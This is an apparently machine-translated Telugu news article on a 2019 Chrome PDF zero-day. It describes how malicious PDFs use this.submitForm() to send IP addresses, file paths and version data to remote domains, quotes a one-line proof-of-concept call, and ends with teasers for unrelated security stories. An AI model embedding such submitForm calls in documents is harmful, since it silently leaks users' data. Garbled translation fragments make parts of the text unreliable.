పిడిఎఫ్ ఫైళ్ళ ద్వారా యూజర్ డేటాను సేకరించడానికి హ్యాకర్లను Chrome దుర్బలత్వం అనుమతిస్తుంది
విషయ సూచిక:
వీడియో: Dame la cosita aaaa 2024
దోపిడీ గుర్తింపు సేవ ఎడ్జ్స్పాట్ PDF పత్రాలను దోపిడీ చేసే చమత్కారమైన Chrome సున్నా-రోజు దుర్బలత్వాన్ని కనుగొంది. Chrome లో తెరిచిన హానికరమైన PDF పత్రాలను ఉపయోగించి సున్నితమైన డేటాను సేకరించడానికి దాడి చేసేవారిని దుర్బలత్వం అనుమతిస్తుంది.
బాధితుడు గూగుల్ క్రోమ్లో సంబంధిత పిడిఎఫ్ ఫైల్లను తెరిచిన వెంటనే, హానికరమైన ప్రోగ్రామ్ యూజర్ డేటాను సేకరించడం ద్వారా నేపథ్యంలో పనిచేయడం ప్రారంభిస్తుంది.
డేటా అప్పుడు హ్యాకర్లచే నియంత్రించబడే రిమోట్ సర్వర్కు ఫార్వార్డ్ చేయబడుతుంది. దాడి చేసేవారు ఏ డేటాను పీల్చుకుంటున్నారో మీరు ఆలోచిస్తూ ఉండవచ్చు, వారు మీ PC లోని క్రింది డేటాను లక్ష్యంగా చేసుకుంటారు:
- IP చిరునామా
- సిస్టమ్లోని PDF ఫైల్ యొక్క పూర్తి మార్గం
- OS మరియు Chrome సంస్కరణలు
మాల్వేర్-రిడిన్ PDF ఫైళ్ళతో జాగ్రత్త వహించండి
PDF ఫైళ్ళను తెరవడానికి అడోబ్ రీడర్ ఉపయోగించినప్పుడు ఏమీ జరగదని మీరు ఆశ్చర్యపోవచ్చు. అదనంగా, వినియోగదారు జోక్యం లేకుండా రిమోట్ సర్వర్లకు డేటాను బదిలీ చేయడానికి HTTP POST అభ్యర్థనలు ఉపయోగించబడతాయి.
రీడ్నోటిఫైకామ్ లేదా బర్ప్కోలాబొరాటోర్నెట్ అనే రెండు డొమైన్లలో ఒకటి డేటాను స్వీకరిస్తోందని నిపుణులు గుర్తించారు.
ఎడ్జ్స్పాట్ గుర్తించిన నమూనాలను చాలా యాంటీవైరస్ సాఫ్ట్వేర్ గుర్తించలేదనే వాస్తవాన్ని పరిగణనలోకి తీసుకోవడం ద్వారా మీరు దాడి యొక్క తీవ్రతను can హించవచ్చు.
వినియోగదారుల యొక్క సున్నితమైన సమాచారాన్ని సేకరించడానికి దాడి చేసేవారు “this.submitForm ()” PDF జావాస్క్రిప్ట్ API ని ఉపయోగిస్తున్నారని నిపుణులు వెల్లడించారు.
మేము దీన్ని కనీస PoC తో పరీక్షించాము, “this.submitForm ('http://google.com/test')” వంటి సాధారణ API కాల్ Google Chrome వ్యక్తిగత డేటాను google.com కు పంపేలా చేస్తుంది.
ఈ క్రోమ్ బగ్ రెండు విభిన్న హానికరమైన పిడిఎఫ్ ఫైళ్ళ ద్వారా దోపిడీ చేయబడుతుందని నిపుణులు వాస్తవానికి కనుగొన్నారు. ఈ రెండూ వరుసగా అక్టోబర్ 2017 మరియు సెప్టెంబర్ 2018 లో పంపిణీ చేయబడ్డాయి.
ముఖ్యంగా, సేకరించిన డేటాను దాడి చేసేవారు భవిష్యత్తులో దాడులను చక్కగా ఉపయోగించుకోవచ్చు. రీడ్నోటిఫై యొక్క పిడిఎఫ్ ట్రాకింగ్ సేవను ఉపయోగించి మొదటి బ్యాచ్ ఫైళ్లు సంకలనం చేయబడిందని నివేదికలు సూచిస్తున్నాయి.
వినియోగదారు వీక్షణలను ట్రాక్ చేయడానికి వినియోగదారులు సేవను ఉపయోగించుకోవచ్చు. ఎడ్జ్స్పాట్ రెండవ పిడిఎఫ్ ఫైళ్ల స్వభావానికి సంబంధించి ఎలాంటి వివరాలను పంచుకోలేదు.
ఎలా రక్షణగా ఉండాలి
ఎక్స్ప్లోయిట్ డిటెక్షన్ సర్వీస్ ఎడ్జ్స్పాట్ వినియోగదారులను క్రోమ్ వినియోగదారులను సంభావ్య ప్రమాదాల గురించి అప్రమత్తం చేయాలనుకుంది ఎందుకంటే సమీప భవిష్యత్తులో ప్యాచ్ విడుదల అవుతుందని is హించలేదు.
ఎడ్జ్స్పాట్ గత ఏడాది దుర్బలత్వం గురించి గూగుల్కు నివేదించింది మరియు ఏప్రిల్ చివరిలో ప్యాచ్ను విడుదల చేస్తామని కంపెనీ హామీ ఇచ్చింది. H
ఏదేమైనా, ప్రత్యామ్నాయ PDF రీడర్ అనువర్తనాన్ని ఉపయోగించి స్వీకరించిన PDF పత్రాలను స్థానికంగా చూడటం ద్వారా సమస్యకు తాత్కాలిక పరిష్కారాన్ని ఉపయోగించడాన్ని మీరు పరిగణించవచ్చు.
ప్రత్యామ్నాయంగా, మీరు మీ సిస్టమ్లను ఇంటర్నెట్ నుండి డిస్కనెక్ట్ చేయడం ద్వారా Chrome లో మీ PDF పత్రాలను కూడా తెరవవచ్చు. ఇంతలో, మీరు ఏప్రిల్ 23 న విడుదల చేయబోయే Chrome 74 నవీకరణ కోసం వేచి ఉండవచ్చు.
పాస్వర్డ్ హాష్లను దొంగిలించడానికి lo ట్లుక్ దుర్బలత్వం హ్యాకర్లను అనుమతిస్తుంది
మైక్రోసాఫ్ట్ lo ట్లుక్ ప్రపంచంలో అత్యంత ప్రాచుర్యం పొందిన ఇమెయిల్ ప్లాట్ఫామ్లలో ఒకటి. నేను వ్యక్తిగతంగా పనికి సంబంధించిన మరియు వ్యక్తిగత పనుల కోసం నా lo ట్లుక్ ఇమెయిల్ చిరునామాపై ఆధారపడతాను. దురదృష్టవశాత్తు, యూజర్లు మనం ఆలోచించదలిచినంత Out ట్లుక్ సురక్షితంగా ఉండకపోవచ్చు. కార్నెగీ మెల్లన్ సాఫ్ట్వేర్ ఇంజనీరింగ్ ఇన్స్టిట్యూట్ ప్రచురించిన ఒక నివేదిక ప్రకారం, lo ట్లుక్…
విండోస్ 10 'స్టోరేజ్ సెన్స్' సిస్టమ్, అనువర్తనాలు, ఆటలు మరియు మీడియా ఫైళ్ళ ద్వారా అందుబాటులో మరియు ఉపయోగించిన నిల్వను చూపుతుంది
విండోస్ 10 పిసి సెట్టింగులలో నిజంగా చక్కని లక్షణంతో వస్తుంది, దీనిని 'స్టోరేజ్ సెన్స్' అని పిలుస్తారు. ఇది వినియోగదారులు తమ నిల్వ ఎలా ఉపయోగించబడుతుందో మరియు ఎంత ఎక్కువ మిగిలి ఉందో దృశ్యమాన ప్రాతినిధ్యాన్ని పొందటానికి అనుమతిస్తుంది. రాబోయే విండోస్ 10 ఆపరేటింగ్ సిస్టమ్లో కొత్త 'స్టోరేజ్ సెన్స్' ఆప్షన్ ఎలా పనిచేస్తుందో పై స్క్రీన్ షాట్ చూపిస్తుంది. మేము…
విండోస్ 10 పాస్వర్డ్ మేనేజర్ బగ్ పాస్వర్డ్లను దొంగిలించడానికి హ్యాకర్లను అనుమతిస్తుంది
గూగుల్లోని భద్రతా పరిశోధకుడైన టావిస్ ఓర్మాండీ ఇటీవల విండోస్ 10 యొక్క పాస్వర్డ్ మేనేజర్లో దాగి ఉన్న దుర్బలత్వాన్ని కనుగొన్నాడు. ఈ బగ్ సైబర్ దాడి చేసేవారికి పాస్వర్డ్లను దొంగిలించడానికి అనుమతిస్తుంది. ఈ లోపం అన్ని విండోస్ 10 పరికరాల్లో ముందే ఇన్స్టాల్ చేయబడిన మూడవ పార్టీ కీపర్ పాస్వర్డ్ మేనేజర్ అనువర్తనంతో వస్తుంది. ఈ లోపం ఒకదానితో సమానంగా ఉందని తెలుస్తోంది…